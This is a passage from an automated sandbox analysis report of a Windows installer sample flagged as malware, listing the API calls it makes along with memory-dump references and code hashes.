                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403F4E
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403F5E
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403F78
                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403F82
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                                                                  • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                                                                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                                                                  • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00014E00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402758
                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3294113728-0
                                                                                                                                                                  • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                                                                  • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                                                                                                                                  • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                                                                  • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                                                                  • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
                                                                                                                                                                  • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                                                  • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                                                                                                  • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                                                                                                                                  • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                                                                                                                                  • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowTextA.USER32(00000000,ylpuxzibyo Setup), ref: 0040397B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                  • String ID: mo$"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe"$1033$I|o$ylpuxzibyo Setup
                                                                                                                                                                  • API String ID: 530164218-553091657
                                                                                                                                                                  • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                                                                                                  • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                                                                                                  • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
                                                                                                                                                                  • GetMessagePos.USER32 ref: 004047A5
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004047BF
                                                                                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
                                                                                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                  • String ID: f
                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                                                                  • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                                                                                                                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                                                                  • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                                                                  • MulDiv.KERNEL32(00066A0C,00000064,00066A10), ref: 00402BB4
                                                                                                                                                                  • wsprintfA.USER32 ref: 00402BC4
                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
                                                                                                                                                                  Strings
                                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                  • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                                                                                                  • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                                                                                                                                  • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                  • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                                                                                                  • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                                                                                                                                  • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                                                                                                                                  • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                  • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                                                                                                  • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                                                                  • wsprintfA.USER32 ref: 0040471E
                                                                                                                                                                  • SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                  • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                                                                                                  • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                                                                                                                                  • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                  • String ID: !
                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                  • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                                                                                                  • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                                                                                                                                  • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                                                                                                                                  • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403117,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                                                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403117,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                                                                                                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                                                                                                                                  Strings
                                                                                                                                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004056BA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245255777.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245435836.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                                                  • API String ID: 2659869361-2382934351
                                                                                                                                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                                                                  • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                                                                                                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                                                                  • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041924B,771B23A0,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                                                                                                    • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041924B,771B23A0), ref: 00404F0F
                                                                                                                                                                    • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                                                                                                    • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.1245175135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.1245154220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.1245214062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
